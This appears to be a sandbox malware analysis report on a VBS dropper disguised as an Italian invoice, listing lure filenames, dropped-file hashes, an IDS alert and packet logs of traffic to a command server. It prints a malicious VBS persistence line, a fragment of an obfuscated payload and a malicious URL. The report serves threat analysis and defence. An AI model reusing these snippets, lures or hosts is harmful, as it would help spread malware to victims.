                                      87M9Y3P4Z7.batGet hashmaliciousAgentTeslaBrowse
                                        ip4.cmdGet hashmaliciousUnknownBrowse
                                          https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                            849128312.cmdGet hashmaliciousUnknownBrowse
                                              Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                  Rechnung-62671596778856538170.vbsGet hashmaliciousPureLog StealerBrowse
                                                    Original Invoice.vbsGet hashmaliciousUnknownBrowse
                                                      FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbsGet hashmaliciousUnknownBrowse
                                                        C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeilZhNx3JAc.batGet hashmaliciousAgentTeslaBrowse
                                                          87M9Y3P4Z7.batGet hashmaliciousAgentTeslaBrowse
                                                            ip4.cmdGet hashmaliciousUnknownBrowse
                                                              https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                                                849128312.cmdGet hashmaliciousUnknownBrowse
                                                                  Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                                    Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                      Rechnung-62671596778856538170.vbsGet hashmaliciousPureLog StealerBrowse
                                                                        Original Invoice.vbsGet hashmaliciousUnknownBrowse
                                                                          FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbsGet hashmaliciousUnknownBrowse
                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1434
                                                                            Entropy (8bit):5.342612360333169
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4TE4KmJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qHd
                                                                            MD5:DED544725C0FC4A9C1A4064260007227
                                                                            SHA1:C196627F0D20E14F0240201AC995E9BEBC399C29
                                                                            SHA-256:82F1B25C0D0DC1B72BFE5E837B668E0087D7E469CCCF909924B72FEC5C1C8F10
                                                                            SHA-512:41A800B36C9017CB5B9D427C9AD317ACAC680FCE5FF85391497F6BE489782423B7E22A27CD7211C2E110B5465418747841A42A16C40D1A41A0CD27D192F2A7A5
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
                                                                            Process:C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\AppData\Roaming\OSDescription.vbs.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):92
                                                                            Entropy (8bit):4.816934446375552
                                                                            Encrypted:false
                                                                            SSDEEP:3:FER/n0eFHHo0nacwREaKC5Nht7E:FER/lFHIcNwiaZ5zC
                                                                            MD5:57F3B1F46DA67D431191E2916C64A2B3
                                                                            SHA1:65CA3FFDA07F0192D5940A3E49366F50A639C9DF
                                                                            SHA-256:7D7838910D3188CFD37791998298F50D8A62996CC32B96723F91A93F840B16FD
                                                                            SHA-512:5C762D4A0F54A1A2E36198E07F0474B171EF9E637CE1B41BD41BE3CAD5A647C1BFD77B730FB945FC0832BEF9B16C66B0CC6F3C8919FCC4B8C3896C2BD9A1FDE7
                                                                            Malicious:true
                                                                            Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\OSDescription.vbs"""
                                                                            Process:C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2500641
                                                                            Entropy (8bit):6.300678398180074
                                                                            Encrypted:false
                                                                            SSDEEP:49152:32D/zgSDcNXiU9R7xbG2Y8nWuanD/11Wr:5iUF
                                                                            MD5:6F5153972552FDC27D794087D11C0F12
                                                                            SHA1:2392E3FB23D622DD6EF791B388BD0ACADEF3F069
                                                                            SHA-256:577564CE2FACE042CCE2F1F7F2A28C42A96D08B3929E63497DA486FD90D295D0
                                                                            SHA-512:B94E7BD7BDEBCF9A6308118CCC0DF4A54091F0EC5F3D18F847107BA81A8F88C8288E76B259978848CF47C4019AB3395645F76B91B29BAD7EF8CEBA09436CA488
                                                                            Malicious:true
                                                                            Preview:REM +d6jS8KoNK9DhI9ldkMk4dDzN6elzGnFqa8wHcQqmd/L1mo3SkL5WaRCp+rhO+jss4mjTYRKji103aETeBfrGOuwmp/Y7ZaN+t4DYiV/5G3GQ2o7h0tbgEg9w22g5uGMV47+MKFIE8byFVOmRysH9Pg0TTSssJGfVBlXmyko7BP8dguXgLTLfTCkSHL3tTgcNc51bJms4Kf9X9yH8XicySk/qdEgcHREaM8ECGceqJ/gOmZas396UJZkmSHXQ4y3B35Jtwxn/MRaMQPJqNc/3rY8p7YSQRapxVk7u9ZSbCRCTAHo1fCTeT6hAIF7sKe+JLtqm5zWpcVnn/KzK0DuB8Xfh1zVVwjGqS14cEGVLRSxfJca6NCIbKY8gDX94E39svi8nClL6M2yo/JvXjWE0nLeAa6p0x/0Vhq1mdbSycnfer5I2JDqZpPJZ0TeGA5xuK7DHt6eU9/ZyEUPlU/34Nopj+N2O/ni9Job4GvaFT4MROEoD6rqQCbebhBK2tFE0odqtYkq+ny04CpDg3Nz/rIHA1Btz9AvPk68mMzplxnJ1g7jcF+04UpldC6Apr2zanBdQteA1wK3Onc6bmKvykgReq1lkI5TUyEGCFuhr5iRCS1ci1VBSP8LLDXoeXPntanlbiwPTtriCu+1es6nFYveqWQ0Uz/zzzGuWmNYa9muHlKxvEBsgbpSeoFmi84wYxepCdAOs2Jq8p/6YfR2iZ8VB1t79VlLcieq4tm9jURjfvZMrmEIoGvwR8qhciDG3PHiUIRytG29XpepZNGJrGValuP9Kdo9DWbwi66OqgAG4wXn2zy/8MmJjlDKXzyaZ5tlRts9yLIWpEMegim/L7SXooDLodAom6UZdJqJc60pVSMSKWMkyRpT0Tb5oW6gyV+bM727z8bKPKs1JFQXjDCV9CwGrAVQctlmd8+ZLvk3eKs67UDvboZcR+2476TFO0QGY61BmhxaS8DkVVf2MA2x/qup3J7wpoWm
                                                                            Process:C:\Windows\System32\cmd.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):433152
                                                                            Entropy (8bit):5.502549953174867
                                                                            Encrypted:false
                                                                            SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                            MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                            SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                            SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: ilZhNx3JAc.bat, Detection: malicious, Browse
                                                                            • Filename: 87M9Y3P4Z7.bat, Detection: malicious, Browse
                                                                            • Filename: ip4.cmd, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: 849128312.cmd, Detection: malicious, Browse
                                                                            • Filename: Tracking#1Z379W410424496200.vbs, Detection: malicious, Browse
                                                                            • Filename: Rechnung0192839182.pdf, Detection: malicious, Browse
                                                                            • Filename: Rechnung-62671596778856538170.vbs, Detection: malicious, Browse
                                                                            • Filename: Original Invoice.vbs, Detection: malicious, Browse
                                                                            • Filename: FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                            Process:C:\Windows\System32\cmd.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):433152
                                                                            Entropy (8bit):5.502549953174867
                                                                            Encrypted:false
                                                                            SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                            MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                            SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                            SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: ilZhNx3JAc.bat, Detection: malicious, Browse
                                                                            • Filename: 87M9Y3P4Z7.bat, Detection: malicious, Browse
                                                                            • Filename: ip4.cmd, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: 849128312.cmd, Detection: malicious, Browse
                                                                            • Filename: Tracking#1Z379W410424496200.vbs, Detection: malicious, Browse
                                                                            • Filename: Rechnung0192839182.pdf, Detection: malicious, Browse
                                                                            • Filename: Rechnung-62671596778856538170.vbs, Detection: malicious, Browse
                                                                            • Filename: Original Invoice.vbs, Detection: malicious, Browse
                                                                            • Filename: FQ____RM quotation_JPEG IMAGE.img_WhatsApp.BZ2.vbs, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                            File type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Entropy (8bit):6.300678398180074
                                                                            TrID:
                                                                              File name:Fattura-24SC-99245969925904728562.vbs
                                                                              File size:2'500'641 bytes
                                                                              MD5:6f5153972552fdc27d794087d11c0f12
                                                                              SHA1:2392e3fb23d622dd6ef791b388bd0acadef3f069
                                                                              SHA256:577564ce2face042cce2f1f7f2a28c42a96d08b3929e63497da486fd90d295d0
                                                                              SHA512:b94e7bd7bdebcf9a6308118ccc0df4a54091f0ec5f3d18f847107ba81a8f88c8288e76b259978848cf47c4019ab3395645f76b91b29bad7ef8ceba09436ca488
                                                                              SSDEEP:49152:32D/zgSDcNXiU9R7xbG2Y8nWuanD/11Wr:5iUF
                                                                              TLSH:11C501621E34DDC87398A4397EBC3650D3E0EEB76C7BD6205297EB5A1B2A9001720F71
                                                                              File Content Preview:REM +d6jS8KoNK9DhI9ldkMk4dDzN6elzGnFqa8wHcQqmd/L1mo3SkL5WaRCp+rhO+jss4mjTYRKji103aETeBfrGOuwmp/Y7ZaN+t4DYiV/5G3GQ2o7h0tbgEg9w22g5uGMV47+MKFIE8byFVOmRysH9Pg0TTSssJGfVBlXmyko7BP8dguXgLTLfTCkSHL3tTgcNc51bJms4Kf9X9yH8XicySk/qdEgcHREaM8ECGceqJ/gOmZas396UJZkmSH
                                                                              Icon Hash:68d69b8f86ab9a86
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-31T14:16:23.610522+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.749740TCP
                                                                              2024-10-31T14:17:08.011978+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.749973TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 31, 2024 14:16:14.609589100 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:14.615664005 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:14.615751028 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:14.631408930 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:14.636415005 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:14.636471987 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:14.641988039 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.551362038 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552174091 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552223921 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.552270889 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552285910 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552305937 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552315950 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552326918 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552330971 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.552376986 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.552542925 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552555084 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552565098 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.552591085 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.552614927 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.557249069 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.557280064 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.557508945 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.691860914 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692014933 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692135096 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.692504883 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692569971 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692583084 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692630053 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.692698956 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692751884 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.692780972 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692794085 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692836046 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.692898989 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692912102 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.692969084 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.693562031 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.693607092 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.693619013 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.693664074 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.693980932 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.694099903 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.694370031 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.783515930 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.808011055 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808032990 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808049917 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808073997 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808109999 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808120966 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808149099 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.808191061 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.808257103 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808720112 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808763981 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808777094 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808779955 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.808815002 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.808954954 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.808967113 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.809009075 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.850703955 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.850738049 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.850753069 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.850815058 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.923333883 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923362017 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923372984 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923438072 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.923466921 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923479080 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923491955 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923515081 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.923902035 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923953056 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.923959970 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.923970938 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.924052000 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.924068928 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.924082041 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.924144983 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.965985060 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.966006041 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.966017008 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.966084003 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.966255903 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:15.966315985 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:15.966404915 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038784027 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038837910 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038851023 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038867950 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.038903952 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038908005 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.038916111 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038927078 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038938999 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.038957119 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.038986921 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.039139032 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.039774895 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.039824963 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.039829969 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.039849997 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.039921045 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.039946079 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.081154108 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.081216097 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.081532955 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.081543922 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.081556082 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.081594944 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.081610918 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.081636906 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.081957102 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153773069 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153801918 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153812885 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153832912 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.153867960 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.153875113 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153887033 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153898954 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.153925896 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.154421091 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.154469967 CET497067702192.168.2.7185.36.141.107
                                                                              Oct 31, 2024 14:16:16.154481888 CET770249706185.36.141.107192.168.2.7
                                                                              Oct 31, 2024 14:16:16.154493093 CET770249706185.36.141.107192.168.2.7
